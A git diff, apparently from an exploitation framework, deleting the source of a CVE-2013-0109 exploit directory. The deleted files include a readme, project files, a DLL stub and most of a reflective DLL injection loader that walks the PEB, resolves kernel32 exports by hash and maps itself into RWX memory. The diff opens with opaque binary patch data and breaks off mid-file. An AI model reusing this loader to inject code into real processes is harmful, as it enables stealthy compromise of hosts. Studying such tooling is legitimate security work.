z=ue^}VsfDO?_yq$IT-VP%ttYQjcJaV5IZ^cl=Y1Dwz#Ocd*dF6dnE3OxGix<;@*#I zj_Vme7`{u29}_4Yr_dlTMEXiRV?Xo-CiuSpz`cyr<%i4lphi6at6C#EH4Cf=1eJ8^#EqQug~pCnc! zK9Klu;?ENwOMD{n>BKFGFDL$y8r++>Kk;zlvBZxO|C;!>#IF-ug_qNj4Umq=;%o7@ z^sxk4Zm`^J8EOf?t6DVA}TiI%CBS(Y42zNN&n#8PfqWm#=mV_9eUjpZrJbC#`^ zS1oT@c3JjW4q4u{oUoj-G+Dm1oVQ%Ec!%~3HHY>Ky*^ahfF(3C)Eb%+ni@Ku+MN-a z9l9X2FtjvuS?G$;2Sa}v`e^7=p)ZDR3;k2*fzUIdeqn>cY+))D4xbuP9#IwXyNGWhMnukv%#AFHTot)4^7+WuB6md|i2Qrx z%~1(a1yT1z{UYkQs28IyMD-fJa`>^~Yoqr@|0Je1=DnCe_|z4un9NUSl0-4YxjE-DW*vO`%74B>tKBSK{A_Z;CHYcr4)$32!9qN%$b)d_wQUYZHeg zh9t%%<|jT1UA5VqIfIPemVTB^miH}M=$)bC!ZX6}kN9oG>c};bzliJxXI)SGoe-57 z)o=KX!-qvLivC6Pv(bNyZjBC%xt4YtACnR@F=lE^K}>m!GiFW9FJoSc*&g$G%r`OP zV#{ew561pB_OsY8V$a3qSr=OE)(Yz?>kHP8t)E#>ThCc9S#O9N8W$cH6K9JX8#jTz zE-P+p+$(Ws<1WN`$9InpjPDnJ6Fr+Veq;Re@z*CzNw6eNNX$!g(5}Bulvj~tv2QyN zX-Ts@M(cjg@&WaE-g1XtcgdlnL(@VhQ+IQyyW-F#q4$M85c)8!^vTfYLbry#O7He| z=&{hxLobG!!j^}f3%fZyB|Mv&s-PWS6=8{(67haSTI8Q2{iFIug+*=n5K&C6yn&LHK_l12M_P6kgh&Lk=BGV&Zjr=;&OpA6$eGLcPGW;Rh z?l;37(Lbf_7R1_Pm&X1kc1!HR*v8mTW50$2{H#}7Z?N8Ojj+aAM_5y>MycU$LJ z^R1=Ud#(3dUDn_5Re6K&%G>m)A6ajTi;c^mZ9fxN6BiI489y_=Aif0p4o<%dSY4P+likh%0>44=YH-u%UsJ+%R`pu`C@p{My5m4OQB(5_tMX84tqTO+3**_ zcZDAezdqvjh!GK~5orLKvc`{R=$E^u?eyJ;qAuQFJpgVeS~j7Qrw*Q{P^C98xyxmeQ)3#BamPjWtn8j zw*1ZFL*Kh6^ybLu$Su)ZqhF5R7QLOX%I@g8=>7C`N242}--z#>kSX-uD)LyYOY@y; zi2NjS)bO7Ve`EN*;f|P}$86#I`$kMn%x=CtU&UM<8yOoHn-n`THZ^u!Y&!kowAd$O zH$(NUu`kD7YaMJ&vW~Wnv!+`oTOHQNt%s})))Ur7>nXn5r>!m4v(|*Tk#VVUdh}vTUf7`U`0#Pzi^4aBdq*Tlp6WRd2{5B?x8D}Uo}{kwK|KhAR?rE0 zK|dG<<6weWz59C;Y|%1Na0)KS>mzu*=Ldp(|Ndp1SR_R=x;e z9_eG##$-ZfWI$I z%wE_ldt-0GFp+(-FZRuTU~l8pqA8j|XBQ}=hL-6Et%7VqP)&#S(BnforV~1&3%a5k zFwUMv^h7W8Mj!M=em)r`Pqvkd+=Qil_3zRUzZJD}rcj>O(A9v>-+@pJTuV98J zm?7aMy|kA_5(#ox@+#h^SMwTP(`$QOu+hL9dEegDn}a3R-jBEQ4&Ko_qm}L;ix^Mv zBv11!&vU{BFYyZhq9Q&;O*BMPv_)5ZiGdiQ@1|moRIicf9nyRhXK_XEK1EC>WKyPOR^}yQIRb^enLI}DxnQLPNs<9} zdM5w0*jjC%Y71R^D2t%&1a%kayFuXt8edQuhfWJhQ_z}$+8p#2pqN3kf$B1Jzk9F_ z7k7K);1K&@r)`v;zv Rs>OP-fv2Q*5B-0C{{mMyP{{xQ literal 0 HcmV?d00001 diff --git a/external/source/exploits/cve-2013-0109/LICENSE.txt b/external/source/exploits/cve-2013-0109/LICENSE.txt deleted file mode 100644 index f217025f51..0000000000 --- a/external/source/exploits/cve-2013-0109/LICENSE.txt +++ /dev/null @@ -1,25 +0,0 @@ -Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -All rights reserved. - -Redistribution and use in source and binary forms, with or without modification, are permitted -provided that the following conditions are met: - - * Redistributions of source code must retain the above copyright notice, this list of -conditions and the following disclaimer. - - * Redistributions in binary form must reproduce the above copyright notice, this list of -conditions and the following disclaimer in the documentation and/or other materials provided -with the distribution. - - * Neither the name of Harmony Security nor the names of its contributors may be used to -endorse or promote products derived from this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/Readme.md b/external/source/exploits/cve-2013-0109/Readme.md deleted file mode 100644 index 814e6e7517..0000000000 --- a/external/source/exploits/cve-2013-0109/Readme.md +++ /dev/null @@ -1,40 +0,0 @@ -About -===== - -Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host. - -Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable. - -Overview -======== - -The process of remotely injecting a library into a process is two fold. Firstly, the library you wish to inject must be written into the address space of the target process (Herein referred to as the host process). Secondly the library must be loaded into that host process in such a way that the library's run time expectations are met, such as resolving its imports or relocating it to a suitable location in memory. - -Assuming we have code execution in the host process and the library we wish to inject has been written into an arbitrary location of memory in the host process, Reflective DLL Injection works as follows. - -* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table. -* As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on. -* The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc. -* The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on. -* The library's headers and sections are loaded into their new locations in memory. -* The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses. -* The ReflectiveLoader will then process the newly loaded copy of its image's relocation table. -* The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory. -* Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate. - -Build -===== - -Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release mode to make inject.exe and reflective_dll.dll - -Usage -===== - -To test use the inject.exe to inject reflective_dll.dll into a host process via a process id, e.g.: - -> inject.exe 1234 - -License -======= - -Licensed under a 3 clause BSD license, please see LICENSE.txt for details. diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln b/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln deleted file mode 100644 index eff992d77c..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln +++ /dev/null @@ -1,20 +0,0 @@ - -Microsoft Visual Studio Solution File, Format Version 10.00 -# Visual C++ Express 2008 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|Win32 = Debug|Win32 - Release|Win32 = Release|Win32 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection -EndGlobal diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj deleted file mode 100644 index 33c6bd9515..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj +++ /dev/null @@ -1,357 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj deleted file mode 100644 index b233a13c97..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj +++ /dev/null @@ -1,266 +0,0 @@ - - - - - Debug - ARM - - - Debug - Win32 - - - Debug - x64 - - - Release - ARM - - - Release - Win32 - - - Release - x64 - - - - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} - reflective_dll - Win32Proj - - - - DynamicLibrary - v100 - MultiByte - true - - - DynamicLibrary - v110 - MultiByte - true - - - DynamicLibrary - v110 - Unicode - - - DynamicLibrary - v110 - Unicode - - - DynamicLibrary - v110 - MultiByte - false - - - DynamicLibrary - v110 - Unicode - - - - - - - - - - - - - - - - - - - - - - - - - <_ProjectFileVersion>11.0.50727.1 - - - $(SolutionDir)$(Configuration)\ - $(Configuration)\ - true - - - true - - - $(SolutionDir)$(Platform)\$(Configuration)\ - $(Platform)\$(Configuration)\ - true - - - $(SolutionDir)$(Configuration)\ - $(Configuration)\ - false - exploit - - - false - - - $(SolutionDir)$(Platform)\$(Configuration)\ - $(Platform)\$(Configuration)\ - false - - - - Disabled - WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - Level3 - EditAndContinue - - - true - Windows - MachineX86 - - - - - Disabled - WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - - Level3 - EditAndContinue - - - true - Windows - - - - - X64 - - - Disabled - WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - Level3 - ProgramDatabase - - - true - Windows - MachineX64 - - - - - MaxSpeed - OnlyExplicitInline - true - WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - Level3 - ProgramDatabase - - - true - Windows - true - true - MachineX86 - - - - - - - - - MinSpace - OnlyExplicitInline - true - WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - - Level3 - ProgramDatabase - true - Default - - - true - Windows - true - true - $(OutDir)$(ProjectName).arm.dll - - - copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\ - - - - - X64 - - - MaxSpeed - OnlyExplicitInline - true - Size - false - WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) - MultiThreaded - true - - Level3 - ProgramDatabase - CompileAsCpp - - - $(OutDir)$(ProjectName).x64.dll - true - Windows - true - true - MachineX64 - - - copy $(OutDir)$(ProjectName).x64.dll ..\bin\ - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters deleted file mode 100644 index 9bb86dca22..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters +++ /dev/null @@ -1,32 +0,0 @@ - - - - - {4FC737F1-C7A5-4376-A066-2A32D752A2FF} - cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx - - - {93995380-89BD-4b04-88EB-625FBE52EBFB} - h;hpp;hxx;hm;inl;inc;xsd - - - - - Source Files - - - Source Files - - - Source Files - - - - - Header Files - - - Header Files - - - \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user deleted file mode 100644 index 695b5c78b9..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user +++ /dev/null @@ -1,3 +0,0 @@ - - - \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h deleted file mode 100644 index 5738497f5b..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h +++ /dev/null @@ -1,51 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c deleted file mode 100644 index cf73a8a853..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c +++ /dev/null @@ -1,33 +0,0 @@ -//===============================================================================================// -// This is a stub for the actuall functionality of the DLL. -//===============================================================================================// -#include "ReflectiveLoader.h" - -// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are -// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own -// DllMain and use the LoadRemoteLibraryR() API to inject this DLL. - -// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) -extern HINSTANCE hAppInstance; -//===============================================================================================// -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - run(); - ExitProcess(0); - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} diff --git a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c b/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c deleted file mode 100644 index 594c0b8066..0000000000 --- a/external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c +++ /dev/null @@ -1,496 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#pragma intrinsic( _ReturnAddress ) -// This function can not be inlined by the compiler or we will not get the address we expect. Ideally -// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of -// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics -// available (and no inline asm available under x64). -__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); } -//===============================================================================================// - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. - -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA = NULL; - GETPROCADDRESS pGetProcAddress = NULL; - VIRTUALALLOC pVirtualAlloc = NULL; - NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; - - USHORT usCounter; - - // the initial location of this image in memory - ULONG_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - ULONG_PTR uiBaseAddress; - - // variables for processing the kernels export table - ULONG_PTR uiAddressArray; - ULONG_PTR uiNameArray; - ULONG_PTR uiExportDir; - ULONG_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - ULONG_PTR uiHeaderValue; - ULONG_PTR uiValueA; - ULONG_PTR uiValueB; - ULONG_PTR uiValueC; - ULONG_PTR uiValueD; - ULONG_PTR uiValueE; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our callers return address. - uiLibraryAddress = caller(); - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. - if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef WIN_X64 - uiBaseAddress = __readgsqword( 0x60 ); -#else -#ifdef WIN_X86 - uiBaseAddress = __readfsdword( 0x30 ); -#else WIN_ARM - uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 ); -#endif -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - - // compute the hash of the module name... - do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the madule name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - else if( (DWORD)uiValueC == NTDLLDLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 1; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - - // we stop searching when we have found everything we need. - if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache ) - break; - - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - - while( uiValueA-- ) - *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; 